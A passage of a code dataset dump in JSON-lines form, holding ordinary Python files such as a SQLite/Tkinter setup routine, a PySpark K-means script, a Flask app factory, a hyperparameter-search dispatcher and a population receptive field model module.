os.path.isfile(\"database_filename\"):\n db = sqlite3.connect(\"database_filename\")\n cursor = db.cursor()\n # Delete any existing data\n cursor.execute('DROP TABLE IF EXISTS tshirts')\n cursor.execute('DROP TABLE IF EXISTS posters')\n cursor.execute('DROP TABLE IF EXISTS boots')\n\n print (\"Existing Data are deleted\")\n\n else:\n db = sqlite3.connect(\"database_filename\")\n cursor = db.cursor()\n print (\"New Database is created\")\n\n # Create a database table\n # add the id as integer primary so it will relate to the unique\n # identification\n cursor.execute('''CREATE TABLE tshirts\n (id INTEGER PRIMARY KEY ASC AUTOINCREMENT,\n name TEXT NOT NULL\n );''');\n cursor.execute('''CREATE TABLE posters\n (id INTEGER PRIMARY KEY ASC AUTOINCREMENT,\n name TEXT NOT NULL\n );''');\n cursor.execute('''CREATE TABLE boots\n (id INTEGER PRIMARY KEY ASC AUTOINCREMENT,\n name TEXT NOT NULL\n );''');\n\n db.commit()\n db.close()\n print (\"Tables are created\")\n\n\ndef start_gui():\n\n MenuGUI().mainloop()\n\n\ndef quit():\n\n sys.exit()\n\n\ndef main():\n setup_database()\n start_gui()\n\n\nif __name__ == '__main__':\n main()","sub_path":"gui_main.py","file_name":"gui_main.py","file_ext":"py","file_size_in_byte":7532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"42066521","text":"# Project Living Index - Dhivya Sivaramakrishnan, Mangesh Bhangare\n\nfrom pyspark import SparkConf, SparkContext\nfrom pyspark.sql import SQLContext, DataFrame, Row\nfrom pyspark.mllib.clustering import KMeans, KMeansModel\nfrom numpy import array\nfrom math import sqrt\n\nimport sys\n\nconf = SparkConf().setAppName('K-Means test')\nsc = SparkContext(conf=conf)\nassert sc.version >= '1.5.1'\nsqlContext = SQLContext(sc)\n\ninput_living_index = sys.argv[1]\n\n# Read the parquet data and convert to RDD\nparquet_living_index = sqlContext.read.parquet(input_living_index)\nparquet_living_index.registerTempTable(\"living_index_table\")\nliving_index_table = sqlContext.sql(\"SELECT * FROM living_index_table\")\nliving_index_rdd = living_index_table.map(lambda colName: (str(colName.Community_Code) + \",\" + str(colName.Crime_Frequency)\n + \",\" + str(colName.Housing_Crowded) + \",\" + str(colName.Household_BPL)\n + \",\" + str(colName.Unemployed) + \",\" + str(colName.Without_Diploma)\n + \",\" + str(colName.Age_Bar) + \",\" + str(colName.Per_Capita_Income)\n + \",\" + str(colName.Hardship_Index)))\n\n# K-means does multiple runs to find the optimal cluster center, so cache the input to K-means\ncluster_input = living_index_rdd.map(lambda line: array([float(x) for x in line.split(',')])).cache()\n\n# Perform K-means clustering\nclusters = KMeans.train(cluster_input, 20, maxIterations=5,\n runs=5, initializationMode=\"random\")\n\n# Compute squared error and change cluster centers\ndef squared_error(point):\n center = clusters.centers[clusters.predict(point)]\n return sqrt(sum([x**2 for x in (point - center)]))\n\nerror = cluster_input.map(lambda point: squared_error(point)).reduce(lambda x, y: x + y)\nprint(\"Squared error for a cluster = \" + str(error))\n\n# Save the cluster model\nclusters.save(sc, \"myModel/living-index\")\nsameModel = KMeansModel.load(sc, \"myModel/living-index\")\n","sub_path":"kmeans-living_index.py","file_name":"kmeans-living_index.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"555600000","text":"\nfrom datetime import datetime\n\nimport pytz\nfrom flask import Flask\n\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_wtf import CSRFProtect\nfrom flask_login import LoginManager\n\ndb = SQLAlchemy()\ncsrf = CSRFProtect()\nlogin_manager = LoginManager()\n\n\ndef create_app(config: str) -> Flask:\n app = Flask(__name__, static_folder='assets/static')\n app.config.from_pyfile(str(config))\n\n db.init_app(app)\n csrf.init_app(app)\n login_manager.init_app(app)\n\n init_blueprints(app)\n init_jinja_env(app)\n init_hooks(app)\n init_login(app)\n\n return app\n\n\ndef init_blueprints(app: Flask):\n from . import views\n app.register_blueprint(views.main)\n app.register_blueprint(views.userbp)\n app.register_blueprint(views.api, url_prefix='/api/v1')\n\n app.errorhandler(404)(views.errors.page_not_found)\n\n\ndef init_jinja_env(app: Flask):\n from . import utils\n app.jinja_env.filters['pretty_size'] = utils.pretty_size\n app.jinja_env.filters['cdatasafe'] = utils.cdatasafe\n app.jinja_env.filters['bootstrap_alert'] = utils.bootstrap_alert\n app.jinja_env.globals['url_for_other_page'] = utils.url_for_other_page\n app.jinja_env.globals['now'] = datetime.now(pytz.utc)\n app.jinja_env.finalize = lambda val: '' if val is None else val\n\n\ndef init_hooks(app: Flask):\n from . import utils\n app.before_request(utils.inject_search_data)\n\n\ndef init_login(app: Flask):\n from . import models\n\n @login_manager.user_loader\n def user_loader(user_id):\n return models.User.query.filter_by(id=int(user_id)).first()\n","sub_path":"pynyaa/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"382452379","text":"# -*- coding:utf-8 -*-\n\nimport time\n\nimport pandas as pd\nfrom IPython.display import display, update_display, display_markdown\n\nfrom ..core.callbacks import EarlyStoppingError\nfrom ..core.dispatcher import Dispatcher\nfrom ..core.trial import Trial\nfrom ..utils import logging, fs\nfrom ..utils.common import config, isnotebook\n\nlogger = logging.get_logger(__name__)\n\n_is_notebook = isnotebook()\n_model_root = config('model_path', 'tmp/models')\n\n\nclass InProcessDispatcher(Dispatcher):\n def __init__(self, models_dir):\n super(InProcessDispatcher, self).__init__()\n\n self.models_dir = models_dir\n fs.makedirs(models_dir, exist_ok=True)\n\n def dispatch(self, hyper_model, X, y, X_eval, y_eval, cv, num_folds, max_trials, dataset_id, trial_store,\n **fit_kwargs):\n retry_limit = int(config('search_retry', '1000'))\n\n trial_no = 1\n retry_counter = 0\n current_trial_display_id = None\n search_summary_display_id = None\n best_trial_display_id = None\n title_display_id = None\n start_time = time.time()\n last_reward = 0\n while trial_no <= max_trials:\n space_sample = hyper_model.searcher.sample()\n if hyper_model.history.is_existed(space_sample):\n if retry_counter >= retry_limit:\n logger.info(f'Unable to take valid sample and exceed the retry limit {retry_limit}.')\n break\n trial = hyper_model.history.get_trial(space_sample)\n for callback in hyper_model.callbacks:\n callback.on_skip_trial(hyper_model, space_sample, trial_no, 'trial_existed', trial.reward, False,\n trial.elapsed)\n retry_counter += 1\n continue\n\n try:\n if trial_store is not None:\n trial = trial_store.get(dataset_id, space_sample)\n if trial is not None:\n reward = trial.reward\n elapsed = trial.elapsed\n trial = Trial(space_sample, trial_no, reward, elapsed)\n improved = hyper_model.history.append(trial)\n hyper_model.searcher.update_result(space_sample, reward)\n for callback in hyper_model.callbacks:\n callback.on_skip_trial(hyper_model, space_sample, trial_no, 'hit_trial_store', reward,\n improved,\n elapsed)\n trial_no += 1\n continue\n\n for callback in hyper_model.callbacks:\n # callback.on_build_estimator(hyper_model, space_sample, estimator, trial_no) #fixme\n callback.on_trial_begin(hyper_model, space_sample, trial_no)\n\n model_file = '%s/%05d_%s.pkl' % (self.models_dir, trial_no, space_sample.space_id)\n\n if _is_notebook:\n df_summary = pd.DataFrame([(trial_no, last_reward, hyper_model.best_trial_no,\n hyper_model.best_reward,\n time.time() - start_time, max_trials)],\n columns=['trial No.', 'Previous reward', 'Best trial', 'Best reward',\n 'Total elapsed',\n 'Max trials'])\n if search_summary_display_id is None:\n handle = display(df_summary, display_id=True)\n if handle is not None:\n search_summary_display_id = handle.display_id\n else:\n update_display(df_summary, display_id=search_summary_display_id)\n\n if current_trial_display_id is None:\n handle = display({'text/markdown': '#### Current Trial:'}, raw=True, include=['text/markdown'],\n display_id=True)\n if handle is not None:\n title_display_id = handle.display_id\n handle = display(space_sample, display_id=True)\n if handle is not None:\n current_trial_display_id = handle.display_id\n else:\n update_display(space_sample, display_id=current_trial_display_id)\n\n trial = hyper_model._run_trial(space_sample, trial_no, X, y, X_eval, y_eval, cv, num_folds, model_file,\n **fit_kwargs)\n last_reward = trial.reward\n if trial.reward != 0: # success\n improved = hyper_model.history.append(trial)\n for callback in hyper_model.callbacks:\n callback.on_trial_end(hyper_model, space_sample, trial_no, trial.reward,\n improved, trial.elapsed)\n else:\n for callback in hyper_model.callbacks:\n callback.on_trial_error(hyper_model, space_sample, trial_no)\n\n if _is_notebook:\n best_trial = hyper_model.get_best_trial()\n if best_trial is not None:\n if best_trial_display_id is None:\n display_markdown('#### Best Trial:', raw=True)\n handle = display(best_trial.space_sample, display_id=True)\n if handle is not None:\n best_trial_display_id = handle.display_id\n else:\n update_display(best_trial.space_sample, display_id=best_trial_display_id)\n\n if logger.is_info_enabled():\n msg = f'Trial {trial_no} done, reward: {trial.reward}, ' \\\n f'best_trial_no:{hyper_model.best_trial_no}, best_reward:{hyper_model.best_reward}\\n'\n logger.info(msg)\n if trial_store is not None:\n trial_store.put(dataset_id, trial)\n except EarlyStoppingError:\n break\n # TODO: early stopping\n except Exception as e:\n import sys\n import traceback\n msg = f'{\">\" * 20} Trial {trial_no} failed! {\"<\" * 20}\\n' \\\n + f'{e.__class__.__name__}: {e}\\n' \\\n + traceback.format_exc() \\\n + '*' * 50\n logger.error(msg)\n finally:\n trial_no += 1\n retry_counter = 0\n\n if _is_notebook:\n update_display({'text/markdown': '#### Top trials:'}, raw=True, include=['text/markdown'],\n display_id=title_display_id)\n df_best_trials = pd.DataFrame([\n (t.trial_no, t.reward, t.elapsed, t.space_sample.vectors) for t in hyper_model.get_top_trials(5)],\n columns=['Trial No.', 'Reward', 'Elapsed', 'Space Vector'])\n if current_trial_display_id is None:\n display(df_best_trials, display_id=True)\n else:\n update_display(df_best_trials, display_id=current_trial_display_id)\n\n return trial_no\n","sub_path":"hypernets/dispatchers/in_process_dispatcher.py","file_name":"in_process_dispatcher.py","file_ext":"py","file_size_in_byte":7498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"282333309","text":"def readInput():\n line1 = input()\n line2 = input()\n line3 = input()\n #把字串轉成整數 , 才能做後續的運算\n num1 = int(line1)\n num2 = int(line2)\n num3 = int(line3)\n\n print(num1+1)\n print(num2+1)\n print(num3+1)\n\n#readInput()\n#numbers.py < 1.txt\n# 1.txt:\n# 10\n# 20\n# 30\n\ndef readInput1():\n line = input()\n cnt = int(line)\n for i in range(0,cnt):\n line = input()\n num = int(line)\n print(num+1)\n\n#numbers.py < num.txt\n\nreadInput1()","sub_path":"2_io/numbers.py","file_name":"numbers.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"572218002","text":"#Author:Sun Jian\nimport xadmin\nfrom .models import CourseOrg,CityDict,Teacher\n\nclass CourseOrgAdmin(object):\n list_display = ['name', 'desc','category', 'click_num', 'fav_num','add_time' ]\n search_fields = ['name', 'desc','category', 'click_num', 'fav_num']\n list_filter = ['name', 'desc', 'category', 'click_num', 'fav_num','city__name','address','add_time']\n # relfield_style = 'fk-ajax'\n\n\nclass CityDictAdmin(object):\n list_display = ['name', 'desc', 'add_time']\n search_fields = ['name', 'desc']\n list_filter = ['name', 'desc', 'add_time']\n\n\nclass TeacherAdmin(object):\n list_display = ['name', 'org', 'work_years', 'work_company','add_time']\n search_fields = ['org', 'name', 'work_years', 'work_company']\n list_filter = ['org__name', 'name', 'work_years', 'work_company','click_num', 'fav_num', 'add_time']\n\n\n\n\nxadmin.site.register(CourseOrg,CourseOrgAdmin)\nxadmin.site.register(CityDict,CityDictAdmin)\nxadmin.site.register(Teacher,TeacherAdmin)\n","sub_path":"apps/organization/adminx.py","file_name":"adminx.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"448010541","text":"import sys\n\n# Opening files\ninputPath = sys.argv[1]\ninputFile = open(inputPath,'r')\noutputPath = sys.argv[2]\noutputFile = open(outputPath, \"w+\")\n\nfor line in inputFile:\n if line != \"\\n\":\n outputFile.write(line)\n\t\t\t\n\ninputFile.close()\noutputFile.close()","sub_path":"src/removeBlankLines.py","file_name":"removeBlankLines.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"84197201","text":"import numpy as np\nimport scipy.signal as signal\nfrom nilearn.glm.first_level.hemodynamic_models import spm_hrf, spm_time_derivative, spm_dispersion_derivative\nfrom .rf import gauss2D_iso_cart # import required RF shapes\nfrom .timecourse import stimulus_through_prf, \\\n convolve_stimulus_dm, \\\n generate_random_cosine_drifts, \\\n generate_arima_noise, \\\n filter_predictions\n\n\nclass Model(object):\n \"\"\"Model\n\n Class that takes care of generating grids for pRF fitting and simulations\n \"\"\"\n\n def __init__(self, stimulus):\n \"\"\"__init__\n\n constructor for Model, takes stimulus object as argument\n\n Parameters\n ----------\n stimulus : PRFStimulus2D or PRFStimulusDD\n Stimulus object containing information about the stimulus,\n and the space in which it lives.\n\n \"\"\"\n self.stimulus = stimulus\n\n def create_hrf(self, hrf_params=[1.0, 1.0, 0.0]):\n \"\"\"\n \n construct single or multiple HRFs \n\n Parameters\n ----------\n hrf_params : TYPE, optional\n DESCRIPTION. The default is [1.0, 1.0, 0.0].\n\n Returns\n -------\n TYPE\n DESCRIPTION.\n\n \"\"\"\n \n hrf = np.array(\n [\n np.ones_like(hrf_params[1])*hrf_params[0] *\n spm_hrf(\n tr=self.stimulus.TR,\n oversampling=1,\n time_length=40)[...,np.newaxis],\n hrf_params[1] *\n spm_time_derivative(\n tr=self.stimulus.TR,\n oversampling=1,\n time_length=40)[...,np.newaxis],\n hrf_params[2] *\n spm_dispersion_derivative(\n tr=self.stimulus.TR,\n oversampling=1,\n time_length=40)[...,np.newaxis]]).sum(\n axis=0) \n\n return hrf.T\n \n def convolve_timecourse_hrf(self, tc, hrf):\n \"\"\"\n \n Convolve neural timecourses with single or multiple hrfs.\n\n Parameters\n ----------\n tc : ndarray, 1D or 2D\n The timecourse(s) to be convolved.\n hrf : ndarray, 1D or 2D\n The HRF. Can be single, or a different one for each timecourse.\n\n Returns\n -------\n convolved_tc : ndarray\n Convolved timecourse.\n\n \"\"\"\n #scipy fftconvolve does not have padding options so doing it manually\n pad_length = 20\n pad = np.tile(tc[:,0], (pad_length,1)).T\n padded_tc = np.hstack((pad,tc))\n \n \n if hrf.shape[0]>1: \n assert hrf.shape[0] == tc.shape[0], f\"{hrf.shape[0]} HRFs provided vs {tc.shape[0]} timecourses\"\n median_hrf = np.median(hrf, axis=0).reshape(1,-1)\n if np.all([np.allclose(median_hrf, single_hrf.reshape(1,-1)) for single_hrf in hrf]): \n \n convolved_tc = signal.fftconvolve(padded_tc, median_hrf, axes=(-1))[..., pad_length:tc.shape[-1]+pad_length]\n \n else: \n convolved_tc = np.zeros_like(tc)\n \n for n_ in range(hrf.shape[0]):\n convolved_tc[n_,:] = signal.fftconvolve(padded_tc[n_,:],hrf[n_,:])[..., pad_length:tc.shape[-1]+pad_length] \n \n else:\n convolved_tc = signal.fftconvolve(padded_tc, hrf, axes=(-1))[..., pad_length:tc.shape[-1]+pad_length] \n\n return convolved_tc\n\n def create_drifts_and_noise(self,\n drift_ranges=[[0, 0]],\n noise_ar=None,\n noise_ma=(1, 0.0),\n noise_amplitude=1.0):\n \"\"\"add_drifs_and_noise\n\n creates noise and drifts of size equal to the predictions\n\n Parameters\n ----------\n drift_ranges : list of 2-lists of floats, optional\n specifies the lower- and upper bounds of the ranges\n of each of the discrete cosine low-pass components\n to be generated\n noise_ar : 2x2 list.\n argument passed to timecourse.generate_arima_noise\n (the default is None, for no noise)\n noise_amplitude : float, optional\n\n \"\"\"\n assert hasattr(\n self, 'predictions'), \"please first create the grid to which to add noise\"\n self.random_drifts = generate_random_cosine_drifts(\n dimensions=self.predictions.shape, amplitude_ranges=drift_ranges)\n if noise_ar is not None:\n self.random_noise = generate_arima_noise(\n ar=noise_ar, ma=noise_ma, dimensions=self.predictions.shape) * noise_amplitude\n else:\n self.random_noise = np.zeros_like(self.predictions)\n\n\nclass Iso2DGaussianModel(Model):\n \"\"\"Iso2DGaussianModel\n To extend please create a setup_XXX_grid function for any new way of\n defining grids.\n \"\"\"\n\n def __init__(self,\n stimulus,\n hrf=None,\n filter_predictions=False,\n filter_type='dc',\n filter_params={},\n normalize_RFs=False,\n **kwargs):\n \"\"\"__init__ for Iso2DGaussianModel\n\n constructor, sets up stimulus and hrf for this Model\n\n Parameters\n ----------\n stimulus : PRFStimulus2D\n Stimulus object specifying the information about the stimulus,\n and the space in which it lives.\n hrf : string, list or numpy.ndarray, optional\n HRF shape for this Model.\n Can be 'direct', which implements nothing (for eCoG or later convolution),\n a list or array of 3, which are multiplied with the three spm HRF basis functions,\n and an array already sampled on the TR by the user.\n (the default is None, which implements standard spm HRF)\n filter_predictions : boolean, optional\n whether to high-pass filter the predictions, default False\n filter_params : see timecourse.py\n \"\"\"\n super().__init__(stimulus)\n self.__dict__.update(kwargs)\n\n # HRF stuff\n if hrf is None: # for use with standard fMRI\n self.hrf = self.create_hrf()\n elif hrf == 'direct': # for use with anything like eCoG with instantaneous irf\n self.hrf = np.array([1])\n # some specific hrf with spm basis set\n elif ((isinstance(hrf, list)) or (isinstance(hrf, np.ndarray))) and len(hrf) == 3:\n self.hrf = self.create_hrf(hrf_params=hrf)\n # some specific hrf already defined at the TR (!)\n elif isinstance(hrf, np.ndarray) and len(hrf) > 3:\n self.hrf = hrf\n\n self.stimulus.convolved_design_matrix = convolve_stimulus_dm(\n stimulus.design_matrix, hrf=self.hrf)\n\n # filtering and other stuff\n self.filter_predictions = filter_predictions\n self.filter_type = filter_type\n \n #settings for filter\n self.filter_params = filter_params\n \n #adding stimulus parameters\n self.filter_params['task_lengths'] = self.stimulus.task_lengths\n self.filter_params['task_names'] = self.stimulus.task_names\n self.filter_params['late_iso_dict'] = self.stimulus.late_iso_dict\n \n #normalizing RFs to have volume 1\n self.normalize_RFs = normalize_RFs\n \n\n def create_rfs(self):\n \"\"\"create_rfs\n\n creates rfs for the grid\n\n \"\"\"\n assert hasattr(self, 'xs'), \"please set up the grid first\"\n self.grid_rfs = np.rot90(gauss2D_iso_cart(\n x=self.stimulus.x_coordinates[..., np.newaxis],\n y=self.stimulus.y_coordinates[..., np.newaxis],\n mu=np.array([self.xs.ravel(), self.ys.ravel()]),\n sigma=self.sizes.ravel(),\n normalize_RFs=self.normalize_RFs).T, axes=(1,2))\n\n def stimulus_times_prfs(self):\n \"\"\"stimulus_times_prfs\n\n creates timecourses for each of the rfs in self.grid_rfs\n\n \"\"\"\n assert hasattr(self, 'grid_rfs'), \"please create the rfs first\"\n self.predictions = stimulus_through_prf(\n self.grid_rfs, self.stimulus.convolved_design_matrix)\n\n\n def create_grid_predictions(self,\n ecc_grid,\n polar_grid,\n size_grid):\n \"\"\"create_predictions\n\n creates predictions for a given set of parameters\n\n [description]\n\n Parameters\n ----------\n ecc_grid : list\n to be filled in by user\n polar_grid : list\n to be filled in by user\n size_grid : list\n to be filled in by user\n \"\"\"\n assert ecc_grid is not None and polar_grid is not None and size_grid is not None, \\\n \"please fill in all spatial grids\"\n\n self.eccs, self.polars, self.sizes = np.meshgrid(\n ecc_grid, polar_grid, size_grid)\n self.xs, self.ys = np.cos(self.polars) * \\\n self.eccs, np.sin(self.polars) * self.eccs\n\n self.create_rfs()\n self.stimulus_times_prfs()\n\n if self.filter_predictions:\n self.predictions = filter_predictions(\n self.predictions,\n self.filter_type,\n self.filter_params)\n self.filtered_predictions = True\n else:\n self.filtered_predictions = False\n\n def return_prediction(self,\n mu_x,\n mu_y,\n size,\n beta,\n baseline,\n hrf_1=None,\n hrf_2=None):\n \"\"\"return_prediction\n\n returns the prediction for a single set of parameters.\n As this is to be used during iterative search, it also\n has arguments beta and baseline.\n\n Parameters\n ----------\n mu_x : float\n x-position of pRF\n mu_y : float\n y-position of pRF\n size : float\n size of pRF\n beta : float\n amplitude of pRF\n baseline : float\n baseline of pRF\n\n Returns\n -------\n numpy.ndarray\n single prediction given the model\n \"\"\"\n if hrf_1 is None or hrf_2 is None:\n current_hrf = self.hrf\n else:\n current_hrf = self.create_hrf([1.0, hrf_1, hrf_2])\n\n # create the single rf\n rf = np.rot90(gauss2D_iso_cart(x=self.stimulus.x_coordinates[..., np.newaxis],\n y=self.stimulus.y_coordinates[..., np.newaxis],\n mu=(mu_x, mu_y),\n sigma=size,\n normalize_RFs=self.normalize_RFs).T, axes=(1,2))\n\n dm = self.stimulus.design_matrix\n neural_tc = stimulus_through_prf(rf, dm)\n\n\n tc = self.convolve_timecourse_hrf(neural_tc, current_hrf)\n \n\n if not self.filter_predictions:\n return baseline[..., np.newaxis] + beta[..., np.newaxis] * tc\n else:\n return baseline[..., np.newaxis] + beta[..., np.newaxis] * filter_predictions(\n tc,\n self.filter_type,\n self.filter_params)\n\n\nclass CSS_Iso2DGaussianModel(Iso2DGaussianModel):\n\n def return_prediction(self,\n mu_x,\n mu_y,\n size,\n beta,\n baseline,\n n,\n hrf_1=None,\n hrf_2=None):\n \"\"\"return_prediction\n\n returns the prediction for a single set of parameters.\n As this is to be used during iterative search, it also\n has arguments beta and baseline.\n\n Parameters\n ----------\n mu_x : float\n x-position of pRF\n mu_y : float\n y-position of pRF\n size : float\n size of pRF\n beta : float, optional\n amplitude of pRF (the default is 1)\n baseline : float, optional\n baseline of pRF (the default is 0)\n n : float, optional\n exponent of pRF (the default is 1, which is a linear Gaussian)\n\n Returns\n -------\n numpy.ndarray\n single prediction given the model\n \"\"\"\n\n if hrf_1 is None or hrf_2 is None:\n current_hrf = self.hrf\n else:\n current_hrf = self.create_hrf([1.0, hrf_1, hrf_2])\n\n # create the single rf\n rf = np.rot90(gauss2D_iso_cart(x=self.stimulus.x_coordinates[..., np.newaxis],\n y=self.stimulus.y_coordinates[..., np.newaxis],\n mu=(mu_x, mu_y),\n sigma=size,\n normalize_RFs=self.normalize_RFs).T, axes=(1,2))\n\n dm = self.stimulus.design_matrix\n neural_tc = stimulus_through_prf(rf, dm)**n[..., np.newaxis]\n \n tc = self.convolve_timecourse_hrf(neural_tc, current_hrf)\n\n if not self.filter_predictions:\n return baseline[..., np.newaxis] + beta[..., np.newaxis] * tc\n else:\n return baseline[..., np.newaxis] + beta[..., np.newaxis] * filter_predictions(\n tc,\n self.filter_type,\n self.filter_params)\n\n\nclass Norm_Iso2DGaussianModel(Iso2DGaussianModel):\n \"\"\"Norm_Iso2DGaussianModel\n\n Redefining class for normalization model\n\n \"\"\"\n\n def create_grid_predictions(self,\n gaussian_params,\n n_predictions,\n n_timepoints,\n sa,\n ss,\n nb,\n sb):\n \"\"\"create_predictions\n\n creates predictions for a given set of parameters\n\n [description]\n\n Parameters\n ----------\n gaussian_params: array size (3), containing prf position and size.\n n_predictions, n_timepoints: self explanatory, obtained from fitter\n nb,sa,ss,sb: meshgrid, created in fitter.grid_fit\n\n \"\"\"\n\n predictions = np.zeros((n_predictions, n_timepoints), dtype='float32') \n \n for idx in range(n_predictions):\n prediction_params = np.array([gaussian_params[0],\n gaussian_params[1],\n gaussian_params[2],\n 1.0,\n 0.0,\n sa[idx],\n ss[idx],\n nb[idx],\n sb[idx]]).T\n predictions[idx,\n :] = self.return_prediction(*list(prediction_params)).astype('float32')\n\n return predictions\n\n def return_prediction(self,\n mu_x,\n mu_y,\n prf_size,\n prf_amplitude,\n bold_baseline,\n srf_amplitude,\n srf_size,\n neural_baseline,\n surround_baseline,\n hrf_1=None,\n hrf_2=None\n ):\n \"\"\"return_prediction [summary]\n\n returns the prediction for a single set of parameters.\n\n Parameters\n ----------\n mu_x : [type]\n [description]\n mu_y : [type]\n [description]\n prf_size : [type]\n [description]\n prf_amplitude : [type]\n [description]\n bold_baseline : [type]\n [description]\n neural_baseline : [type]\n [description]\n srf_amplitude : [type]\n [description]\n srf_size : [type]\n [description]\n surround_baseline : [type]\n [description]\n\n\n Returns\n -------\n numpy.ndarray\n single prediction given the model\n \"\"\"\n\n if hrf_1 is None or hrf_2 is None:\n current_hrf = self.hrf\n else:\n current_hrf = self.create_hrf([1.0, hrf_1, hrf_2])\n\n # create the rfs\n\n prf = np.rot90(gauss2D_iso_cart(x=self.stimulus.x_coordinates[..., np.newaxis],\n y=self.stimulus.y_coordinates[..., np.newaxis],\n mu=(mu_x, mu_y),\n sigma=prf_size,\n normalize_RFs=self.normalize_RFs).T, axes=(1,2))\n\n # surround receptive field (denominator)\n srf = np.rot90(gauss2D_iso_cart(x=self.stimulus.x_coordinates[..., np.newaxis],\n y=self.stimulus.y_coordinates[..., np.newaxis],\n mu=(mu_x, mu_y),\n sigma=srf_size,\n normalize_RFs=self.normalize_RFs).T, axes=(1,2))\n\n dm = self.stimulus.design_matrix\n\n # create normalization model timecourse\n neural_tc = (prf_amplitude[..., np.newaxis] * stimulus_through_prf(prf, dm) + neural_baseline[..., np.newaxis]) /\\\n (srf_amplitude[..., np.newaxis] * stimulus_through_prf(srf, dm) + surround_baseline[..., np.newaxis]) \\\n - neural_baseline[..., np.newaxis]/surround_baseline[..., np.newaxis]\n\n tc = self.convolve_timecourse_hrf(neural_tc, current_hrf)\n \n if not self.filter_predictions:\n return bold_baseline[..., np.newaxis] + tc\n else:\n return bold_baseline[..., np.newaxis] + filter_predictions(\n tc,\n self.filter_type,\n self.filter_params)\n\n\n\nclass DoG_Iso2DGaussianModel(Iso2DGaussianModel):\n \"\"\"redefining class for difference of Gaussians in iterative fit.\n \"\"\"\n\n def return_prediction(self,\n mu_x,\n mu_y,\n prf_size,\n prf_amplitude,\n bold_baseline,\n\n srf_amplitude,\n srf_size,\n hrf_1=None,\n hrf_2=None\n ):\n \"\"\"return_prediction\n\n returns the prediction for a single set of parameters.\n As this is to be used during iterative search, it also\n has arguments beta and baseline.\n\n Parameters\n ----------\n mu_x : float\n x-position of pRF\n mu_y : float\n y-position of pRF\n prf_size : float\n size of pRF\n\n\n Returns\n -------\n numpy.ndarray\n single prediction given the model\n \"\"\"\n if hrf_1 is None or hrf_2 is None:\n current_hrf = self.hrf\n else:\n current_hrf = self.create_hrf([1.0, hrf_1, hrf_2])\n # create the rfs\n prf = np.rot90(gauss2D_iso_cart(x=self.stimulus.x_coordinates[..., np.newaxis],\n y=self.stimulus.y_coordinates[..., np.newaxis],\n mu=(mu_x, mu_y),\n sigma=prf_size,\n normalize_RFs=self.normalize_RFs).T, axes=(1,2))\n\n # surround receptive field\n srf = np.rot90(gauss2D_iso_cart(x=self.stimulus.x_coordinates[..., np.newaxis],\n y=self.stimulus.y_coordinates[..., np.newaxis],\n mu=(mu_x, mu_y),\n sigma=srf_size,\n normalize_RFs=self.normalize_RFs).T, axes=(1,2))\n\n dm = self.stimulus.design_matrix\n\n neural_tc = prf_amplitude[..., np.newaxis] * stimulus_through_prf(prf, dm) - \\\n srf_amplitude[..., np.newaxis] * stimulus_through_prf(srf, dm)\n\n tc = self.convolve_timecourse_hrf(neural_tc, current_hrf)\n\n if not self.filter_predictions:\n return bold_baseline[..., np.newaxis] + tc\n else:\n return bold_baseline[..., np.newaxis] + filter_predictions(\n tc,\n self.filter_type,\n self.filter_params)\n","sub_path":"mri_analysis/model/prfpy/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":20783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"369826469","text":"# -*- coding:utf-8 -*-\n# @Desc: \n# @Author: Administrator\n# @Date: 2018-04-29 12:09\n\n### 练习:九九乘法表\nx = 1 # 控制行数\nwhile x <= 9:\n y = 1 # 控制行的列数\n while y <= x:\n # print(str(y) + \"*\" + str(x) + \"=\" + str(y*x),end = \" \")\n print(\"%d*%d=%d\\t\"%(y,x,x*y),end = \"\")\n y += 1\n print()\n x += 1\n\n\n\n\n","sub_path":"01.PythonDoc/02.控制流程语句/04.while循环的嵌套使用二.py","file_name":"04.while循环的嵌套使用二.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"272783305","text":"\n\nimport numpy as np\nx=np.random.random(10)\ny=np.random.random(10)\nX=np.vstack([x,y])\nsk=np.var(X,axis=0,ddof=1)\nd1=np.sqrt(((x-y)**2/sk).sum())\nprint(d1)\ndef createDataSet():\n group=np.array([[1,101],[5,89],[108,5],[115,8]])\n labels=['爱情片','爱情片','动作片','动作片']\n return group,labels\nif __name__=='__main__':\n group,labels=createDataSet()\n print(\"数据样本group:\",group)\n print(\"特征标签labels:\",labels)\n","sub_path":"echarts/python/作业/CreateDataSet.py","file_name":"CreateDataSet.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"164788852","text":" # INPUTCUSTOM()\n\nimport pyinputplus as p\n\ndef addupto(num):\n numlist = list(num)\n for i, digit in enumerate(numlist):\n numlist[i] = int(digit)\n if sum(numlist) != 10:\n raise Exception('The digit must be add up to 10 and not %s.'%(sum(numlist)))\n return int(num)\n\ni = p.inputCustom(addupto)\n\n\n","sub_path":"input validation/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"112803333","text":"from functools import reduce\ndef shuffle(pairs):\n d = {}\n for pair in pairs:\n if not d.get(pair[0]):\n d[pair[0]] = []\n d[pair[0]].append(pair[1])\n return [(key, d[key]) for key in d]\n\n\"\"\"in the beginning God created the heavens and the earth Now the earth was formless and empty darkness was over the surface of the deep and the Spirit of God was hovering over the waters And God said Let there be light and there was light God saw that the light was good and he separated the 